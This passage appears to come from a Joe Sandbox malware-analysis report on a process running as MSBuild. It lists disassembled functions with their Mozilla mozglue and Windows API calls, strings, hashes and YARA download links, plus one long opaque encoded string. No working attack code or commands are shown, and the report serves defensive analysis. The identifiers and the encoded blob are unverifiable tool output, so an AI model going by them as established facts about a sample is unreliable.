                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 312751069bc5c79deec77c239b529fa3d54b3025410e851dec62c589f1cfdb27
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B014F74B082819BDF108F9DCA14A4637B5E74AF1EF30092DE911D2B40D7B0A944CA4B
                                                                                                                                                                                                                      Function 6C8C05F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C8BCFAE,?,?,?,6C8831A7), ref: 6C8C05FB
                                                                                                                                                                                                                      • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C8BCFAE,?,?,?,6C8831A7), ref: 6C8C0616
                                                                                                                                                                                                                      • strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C8831A7), ref: 6C8C061C
                                                                                                                                                                                                                      • _write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C8831A7), ref: 6C8C0627
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _writestrlen
                                                                                                                                                                                                                      • String ID: : (malloc) Error in VirtualFree()$<jemalloc>
                                                                                                                                                                                                                      • API String ID: 2723441310-2186867486
                                                                                                                                                                                                                      • Opcode ID: 352c4b75c9149c8f8006d3481a2e8a30252f0b4343ebf99cefd12854bf558080
                                                                                                                                                                                                                      • Instruction ID: 1caeed4b83fa6030dfbfb563a80b534f12008ba6f540fcee233547abd27262e0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 352c4b75c9149c8f8006d3481a2e8a30252f0b4343ebf99cefd12854bf558080
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 93E086E2A0101037F52422596C46DB7761CDBC61B4F04003DFD0D43301E94AAD1A51F6
                                                                                                                                                                                                                      Function 6C8905F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                      • Opcode ID: 6cb4198389917e2ae35bceb39b502074c1dceb27aa0a3fd86bc6de9ab1e7960f
                                                                                                                                                                                                                      • Instruction ID: 35af80d83d0fd59c821777499561c9cc6cbff2fa81e429280142b35ef9494aad
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6cb4198389917e2ae35bceb39b502074c1dceb27aa0a3fd86bc6de9ab1e7960f
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DCA15B70A04705CFDB24CF29C684A99FBF1BF49314F148A6ED44AA7B01D731AA55CF90
                                                                                                                                                                                                                      Function 6C8C71A0 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 212COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8C6060: moz_xmalloc.MOZGLUE(00000024,546D5915,00000000,?,00000000,?,?,6C8C5FCB,6C8C79A3), ref: 6C8C6078
                                                                                                                                                                                                                      • free.MOZGLUE(-00000001), ref: 6C8C72F6
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8C7311
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$moz_xmalloc
                                                                                                                                                                                                                      • String ID: 333s$333s$Copied unique strings$Spliced unique strings
                                                                                                                                                                                                                      • API String ID: 3009372454-760240034
                                                                                                                                                                                                                      • Opcode ID: 8eced5183817aa05b9ffc2ca6f0a90831fb53d6cc510d5c3d848b85bfc011fc6
                                                                                                                                                                                                                      • Instruction ID: 2984bad92f9c72c82f99cd7c4c4614b62602296d829e0c11c71c7782c63df340
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8eced5183817aa05b9ffc2ca6f0a90831fb53d6cc510d5c3d848b85bfc011fc6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EC71A571F006198FDB24CF69D99069EB7F2AF88304F25852DD81AAB710DB35ED46CB81
                                                                                                                                                                                                                      Function 6C8E14A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8E14C5
                                                                                                                                                                                                                      • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C8E14E2
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8E1546
                                                                                                                                                                                                                      • InitializeConditionVariable.KERNEL32(?), ref: 6C8E15BA
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8E16B4
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1909280232-0
                                                                                                                                                                                                                      • Opcode ID: 087b6f27a4e0548f22783ac233ddc853ac5cb67715559afdf35cbfb6f9561120
                                                                                                                                                                                                                      • Instruction ID: 6b9b611ea66429ab67292df26062a85a602e542a300b7fa02e8ae0240eb9ea41
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 087b6f27a4e0548f22783ac233ddc853ac5cb67715559afdf35cbfb6f9561120
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D61F231A04744DBDB218F24C980BDEB7B5BF8A308F44892CED8A57712DB31E995CB91
                                                                                                                                                                                                                      Function 6C8DC160 Relevance: 9.2, APIs: 6, Instructions: 174COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C8DC1F1
                                                                                                                                                                                                                      • memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C8DC293
                                                                                                                                                                                                                      • fgetc.API-MS-WIN-CRT-STDIO-L1-1-0(?), ref: 6C8DC29E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: fgetc$memcpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1522623862-0
                                                                                                                                                                                                                      • Opcode ID: 3edf1069aae263e99f34730bf2cbfd261bc80405a0789897f01b023b157f46fd
                                                                                                                                                                                                                      • Instruction ID: 7a8f1d7b3b7d2696fd0001cbaee5247667fb6ae26d463bcd03f3e4f7e244ccad
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3edf1069aae263e99f34730bf2cbfd261bc80405a0789897f01b023b157f46fd
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E61AB71A04218CFCF25DFA8D9809AEBBB5FF49314F264929E912A7751C731B944CFA0
                                                                                                                                                                                                                      Function 6C8D9F40 Relevance: 9.2, APIs: 6, Instructions: 157timeCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C8D9FDB
                                                                                                                                                                                                                      • free.MOZGLUE(?,?), ref: 6C8D9FF0
                                                                                                                                                                                                                      • free.MOZGLUE(?,?), ref: 6C8DA006
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C8DA0BE
                                                                                                                                                                                                                      • free.MOZGLUE(?,?), ref: 6C8DA0D5
                                                                                                                                                                                                                      • free.MOZGLUE(?,?), ref: 6C8DA0EB
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$StampTimeV01@@Value@mozilla@@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 956590011-0
                                                                                                                                                                                                                      • Opcode ID: 962619fc14a807ea9fe6662ac103f5653f2e15304504b9dc73f90c536447b78a
                                                                                                                                                                                                                      • Instruction ID: 3ee85c39e64b96df11a7d4fb43026a2fc47ee1db4f67d3893d406680cf30308d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 962619fc14a807ea9fe6662ac103f5653f2e15304504b9dc73f90c536447b78a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B61A075508701DFC721CF58C58059AB3F5FF88328F558A69E8999B702EB32E986CBC1
                                                                                                                                                                                                                      Function 6C8DDC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 6C8DDC60
                                                                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(?,?,?,6C8DD38A,?), ref: 6C8DDC6F
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,6C8DD38A,?), ref: 6C8DDCC1
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C8DD38A,?), ref: 6C8DDCE9
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C8DD38A,?), ref: 6C8DDD05
                                                                                                                                                                                                                      • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C8DD38A,?), ref: 6C8DDD4A
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1842996449-0
                                                                                                                                                                                                                      • Opcode ID: 908464e32eaaa828002ac8fb591bf7e76978e65b9e62caaae9d263dedb824c65
                                                                                                                                                                                                                      • Instruction ID: 64c5df1e937a0464753f77b9b17259bf5c751b559b87c0865548f3c9b7411e59
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 908464e32eaaa828002ac8fb591bf7e76978e65b9e62caaae9d263dedb824c65
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B416BB5A00606DFCB10CFA9C98099AB7F5FF89314B66496AD945ABB10D771FC01CFA0
                                                                                                                                                                                                                      Function 6C8C6590 Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 342COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 6C8BFA80: GetCurrentThreadId.KERNEL32 ref: 6C8BFA8D
                                                                                                                                                                                                                        • Part of subcall function 6C8BFA80: AcquireSRWLockExclusive.KERNEL32(6C90F448), ref: 6C8BFA99
                                                                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C8C6727
                                                                                                                                                                                                                      • ?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C8C67C8
                                                                                                                                                                                                                        • Part of subcall function 6C8D4290: memcpy.VCRUNTIME140(?,?,6C8E2003,6C8E0AD9,?,6C8E0AD9,00000000,?,6C8E0AD9,?,00000004,?,6C8E1A62,?,6C8E2003,?), ref: 6C8D42C4
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
                                                                                                                                                                                                                      • String ID: data
                                                                                                                                                                                                                      • API String ID: 511789754-2918445923
                                                                                                                                                                                                                      • Opcode ID: 5c76cdbfd9846b3c74a32a6e0bbd120755036f4981c512c59a3962a466424477
                                                                                                                                                                                                                      • Instruction ID: a24c5e54799effa483aaea0ea705e6a0ed682b1b54371c10bbc893a5bc4834e2
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5c76cdbfd9846b3c74a32a6e0bbd120755036f4981c512c59a3962a466424477
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0AD18C75B083408BD734DF28CA41BAAB7E5AFC6308F108D2DE59997B51DB30E949CB52
                                                                                                                                                                                                                      Function 6C8DC810 Relevance: 9.1, APIs: 6, Instructions: 75COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C8DC82D
                                                                                                                                                                                                                      • ??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C8DC842
                                                                                                                                                                                                                        • Part of subcall function 6C8DCAF0: ?_Getgloballocale@locale@std@@CAPAV_Locimp@12@XZ.MSVCP140(00000000,00000000,?,6C8FB5EB,00000000), ref: 6C8DCB12
                                                                                                                                                                                                                      • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(?,?,00000000), ref: 6C8DC863
                                                                                                                                                                                                                      • std::_Facet_Register.LIBCPMT ref: 6C8DC875
                                                                                                                                                                                                                        • Part of subcall function 6C8BB13D: ??_U@YAPAXI@Z.MOZGLUE(00000008,?,?,6C8FB636,?), ref: 6C8BB143
                                                                                                                                                                                                                      • ??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C8DC89A
                                                                                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C8DC8BC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Facet_Getcat@?$codecvt@Getgloballocale@locale@std@@Locimp@12@Mbstatet@@@std@@RegisterV42@@Vfacet@locale@2@abortstd::_
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2745304114-0
                                                                                                                                                                                                                      • Opcode ID: 0f4b0329076fdd5626f929e278dee256a426fbe05b68891eec90c58976454f6c
                                                                                                                                                                                                                      • Instruction ID: 49b81bd2a92c66a8866c8731fa19d8d3af1aed03a2681f1fc84b9e01b8596851
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0f4b0329076fdd5626f929e278dee256a426fbe05b68891eec90c58976454f6c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F31163B5B042099FCB00DFA4C9958AEBBB5EF89354F20052DE60697341DB30A954CB91
                                                                                                                                                                                                                      Function 6C8DCCF0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 299COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(000000E0,00000000,?,6C8CDA31,00100000,?,?,00000000,?), ref: 6C8DCDA4
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: malloc.MOZGLUE(?), ref: 6C89CA26
                                                                                                                                                                                                                        • Part of subcall function 6C8DD130: InitializeConditionVariable.KERNEL32(00000010,00020000,00000000,00100000,?,6C8DCDBA,00100000,?,00000000,?,6C8CDA31,00100000,?,?,00000000,?), ref: 6C8DD158
                                                                                                                                                                                                                        • Part of subcall function 6C8DD130: InitializeConditionVariable.KERNEL32(00000098,?,6C8DCDBA,00100000,?,00000000,?,6C8CDA31,00100000,?,?,00000000,?), ref: 6C8DD177
                                                                                                                                                                                                                      • ?profiler_get_core_buffer@baseprofiler@mozilla@@YAAAVProfileChunkedBuffer@2@XZ.MOZGLUE(?,?,00000000,?,6C8CDA31,00100000,?,?,00000000,?), ref: 6C8DCDC4
                                                                                                                                                                                                                        • Part of subcall function 6C8D7480: ReleaseSRWLockExclusive.KERNEL32(?,6C8E15FC,?,?,?,?,6C8E15FC,?), ref: 6C8D74EB
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000014,?,?,?,00000000,?,6C8CDA31,00100000,?,?,00000000,?), ref: 6C8DCECC
                                                                                                                                                                                                                        • Part of subcall function 6C89CA10: mozalloc_abort.MOZGLUE(?), ref: 6C89CAA2
                                                                                                                                                                                                                        • Part of subcall function 6C8CCB30: floor.API-MS-WIN-CRT-MATH-L1-1-0(?,?,00000000,?,6C8DCEEA,?,?,?,?,00000000,?,6C8CDA31,00100000,?,?,00000000), ref: 6C8CCB57
                                                                                                                                                                                                                        • Part of subcall function 6C8CCB30: _beginthreadex.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,6C8CCBE0,00000000,00000000,00000000,?,?,?,?,00000000,?,6C8DCEEA,?,?), ref: 6C8CCBAF
                                                                                                                                                                                                                      • tolower.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,00000000,?,6C8CDA31,00100000,?,?,00000000,?), ref: 6C8DD058
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • xSYpaQ0DEooxRigYYpKXFGKYCUUtGKLjGkUdqWkouFxKKXFJQMSilooAbSU6igY2jvS0lAxKKWkoGJikNOpCKAEpKdikoGIRSU6koGNIoxS0lAISilxSEUFCUGjFFADT60E0pFJQUJRS470hoAQ0fjS0negYhpD/KnUnSgYhpMUvaiiwxuMGg+ppTSUDA0nSloxjtQCGk0HnNB/Sg8ZoKEpKU9aKAG9KOtKfrRQMbjiiiigaA9KTNL/WigYmMCkINOpO, xrefs: 6C8DCD2C
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ConditionInitializeVariablemoz_xmalloc$?profiler_get_core_buffer@baseprofiler@mozilla@@Buffer@2@ChunkedExclusiveLockProfileRelease_beginthreadexfloormallocmozalloc_aborttolower
                                                                                                                                                                                                                      • String ID: xSYpaQ0DEooxRigYYpKXFGKYCUUtGKLjGkUdqWkouFxKKXFJQMSilooAbSU6igY2jvS0lAxKKWkoGJikNOpCKAEpKdikoGIRSU6koGNIoxS0lAISilxSEUFCUGjFFADT60E0pFJQUJRS470hoAQ0fjS0negYhpD/KnUnSgYhpMUvaiiwxuMGg+ppTSUDA0nSloxjtQCGk0HnNB/Sg8ZoKEpKU9aKAG9KOtKfrRQMbjiiiigaA9KTNL/WigYmMCkINOpO
                                                                                                                                                                                                                      • API String ID: 861561044-1831941291
                                                                                                                                                                                                                      • Opcode ID: 48b078eed1cf260f8b8cce00bf641a71d12b09c413f5b4012ac8832d0bcfa5e8
                                                                                                                                                                                                                      • Instruction ID: 8af36a224364a06825288a33f4a20be5fe9d6f24647efcf746b0a3e899242355
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 48b078eed1cf260f8b8cce00bf641a71d12b09c413f5b4012ac8832d0bcfa5e8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A6D17E71A04B069FD718CF28C580B99F7E1BF89308F018A2DD95987712EB71F9A5CB91
                                                                                                                                                                                                                      Function 6C8BD5D0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C88EB57,?,?,?,?,?,?,?,?,?), ref: 6C8BD652
                                                                                                                                                                                                                      • memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C88EB57,?), ref: 6C8BD660
                                                                                                                                                                                                                      • free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C88EB57,?), ref: 6C8BD673
                                                                                                                                                                                                                      • free.MOZGLUE(?), ref: 6C8BD888
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000004.00000002.2230392944.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230369472.000000006C880000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230729954.000000006C8FD000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230783588.000000006C90E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000004.00000002.2230808938.000000006C912000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_6c880000_MSBuild.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: free$memsetmoz_xmalloc
                                                                                                                                                                                                                      • String ID: |Enabled
                                                                                                                                                                                                                      • API String ID: 4142949111-2633303760
                                                                                                                                                                                                                      • Opcode ID: 7b099a2d9cc5b15df5b9c84180bbe93ce2b3b16e8dc375ffad38d322e421d384
